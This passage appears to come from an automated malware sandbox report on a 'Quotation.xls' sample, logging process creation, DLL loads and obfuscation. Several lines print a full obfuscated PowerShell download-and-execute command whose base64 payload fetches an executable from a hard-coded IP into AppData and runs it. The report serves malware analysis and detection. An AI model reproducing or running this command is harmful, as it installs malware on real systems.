xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: bcrypt.dll
            Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: ucrtbase.dll
            Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wow64win.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: shcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rstrtmgr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: bcrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: nlaapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: bcrypt.dll
            Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: ucrtbase.dll
            Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wow64win.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: shcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: rstrtmgr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: bcrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
            Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: Quotation.xls Static file information: File size 1129472 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdb source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdbhPD source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdbhPE source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdb source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: ~DF91B6A489623540E3.TMP.0.dr Initial sample: OLE indicators vbamacros = False
            Source: Quotation.xls Initial sample: OLE indicators encrypted = True

            Data Obfuscation

            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
